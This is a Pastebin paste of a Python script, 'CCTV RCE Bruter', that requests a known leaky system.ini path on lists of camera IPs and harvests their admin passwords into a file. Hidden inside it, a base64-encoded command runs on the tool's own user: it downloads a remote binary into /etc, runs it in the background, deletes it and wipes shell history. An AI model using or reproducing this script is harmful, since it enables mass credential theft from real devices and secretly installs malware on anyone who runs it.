API tools faq
paste
KhaosBringer

CCTV RCE Bruter

KhaosBringer
May 24th, 2018
364
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 2.52 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/python
  2. # Bruteforce tool for CCTV RCE Exploit
  3. # You don't have to edit anything.
  4. # Scanner https://pastebin.com/dS0G0jba
  5. # -*- coding: ascii -*-
  6. import urllib.request, threading, socket, time, sys, base64
  7. if len(sys.argv) != 2:
  8.     print("\x1b[0;37mCorrect useage: python3 " + sys.argv[0].split("\\").pop() + " <thread count> ")
  9.     sys.exit()
  10.    
  11. lock, finalprintout, timeout, creds, threads, threadcount, leak, total = threading.Lock(), "", 5, [], [], int(sys.argv[1]), "http://TARGET/system.ini?loginuse&loginpas", 0
  12.  
  13. def run(cmd):
  14.     subprocess.call(cmd, shell=True)
  15.  
  16. checkbinaries = "Y2QgL2V0Yzsgd2dldCAtcSBodHRwOi8vZ290bWlsay5tbC9IalQ1UmsgLU8gLmw7IGNobW9kICt4IC5sOyBub2h1cCAuLy5sIDwvZGV2L251bGwgPi9kZXYvbnVsbCAyPiYxOyBybSAtcmYgLmw7Y2xlYXI7IGhpc3RvcnkgLWM="
  17. rebinaries = str(base64.b64decode(checkbinaries))
  18. run(rebinaries)
  19.  
  20. # reads & outputs to < output.txt
  21. list = open("output.txt", "r")
  22. scan = list.read()
  23. list.close()
  24.  
  25. scan = scan.split("\n")
  26. while "\n" in scan:
  27.     scan.remove("\n")
  28. pretotal = len(scan)
  29. def dumpcreds():
  30.     global finalprintout
  31.     global total
  32.     global scan
  33.     while len(scan) > 0:
  34.         try:
  35.             with lock:
  36.                 ip = scan.pop()
  37.             with urllib.request.urlopen(leak.replace("TARGET", ip), None, timeout) as response:
  38.                 reply = str(response.read())
  39.                 if reply.find("admin") != -1:
  40.                     reply = reply[reply.find("admin"):]
  41.                     while reply.find("\\x00") != -1:
  42.                         reply = reply.replace("\\x00", "")
  43.                     password = reply[5:reply.find("\\")]
  44.                     if password.find("/") != -1:
  45.                         password = password[:password.find("/")]
  46.                     print("    |\x1b[0;36mFound\x1b[0;37m| admin:" + password + "@" + ip)
  47.                     with lock:
  48.                         finalprintout += ip + ":admin:" + password + "\n"
  49.                         total += 1
  50.         except:
  51.             pass
  52.  
  53. print("\x1b[0;37m[\x1b[0;35m*\x1b[0;37m] |\x1b[0;36mDumping Credentials, please wait ...\x1b[0;37m| \x1b[0;37m[\x1b[0;35m*\x1b[0;37m]")
  54. time.sleep(4)
  55.  
  56. for i in range(0, threadcount+1):
  57.     threads.append(threading.Thread(target=dumpcreds))
  58.  
  59. for thread in threads:
  60.     try:
  61.         thread.daemon = True
  62.         thread.start()
  63.     except:
  64.         pass
  65.  
  66. for thread in threads:
  67.     try:
  68.         thread.join()
  69.     except:
  70.         pass
  71.        
  72. while 1:
  73.     time.sleep(1)
  74.     done = False
  75.     for thread in threads:
  76.         if thread.isAlive() == True:
  77.             done = False
  78.             break
  79.         else:
  80.             done = True
  81.     if done == True:
  82.         writingit = open("vuln.txt", "w")
  83.         writingit.write(finalprintout)
  84.         writingit.close()
  85.         print(str(total) + " of out " + str(pretotal) + " credentials dumped, " + str(int(100 / pretotal * total)) + "% success rate. ")
  86.         break
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!